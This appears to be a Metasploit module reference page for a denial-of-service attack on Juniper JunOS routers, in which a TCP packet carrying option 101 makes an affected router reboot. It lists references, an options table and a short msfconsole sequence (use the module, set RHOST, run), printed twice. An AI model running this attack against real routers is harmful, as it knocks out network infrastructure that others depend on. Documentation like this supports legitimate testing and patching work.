Juniper JunOS Malformed TCP Option
This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.
Rank
- Manual
Authors
- todb < todb [at] metasploit.com >
Vulnerability References
- BID-37670
- OSVDB-61538
- http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core...
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/tcp/junos_tcp_opt
msf auxiliary(junos_tcp_opt) > set RHOST [TARGET IP]
msf auxiliary(junos_tcp_opt) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/tcp/junos_tcp_opt
msf auxiliary(junos_tcp_opt) > set RHOST [TARGET IP]
msf auxiliary(junos_tcp_opt) > run
Module Options
| INTERFACE | The name of the interface |
| RHOST | The target address |
| RPORT | The destination port (defaults to random) |
| SHOST | Source address (defaults to random) |
| SPORT | Source port (defaults to random) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |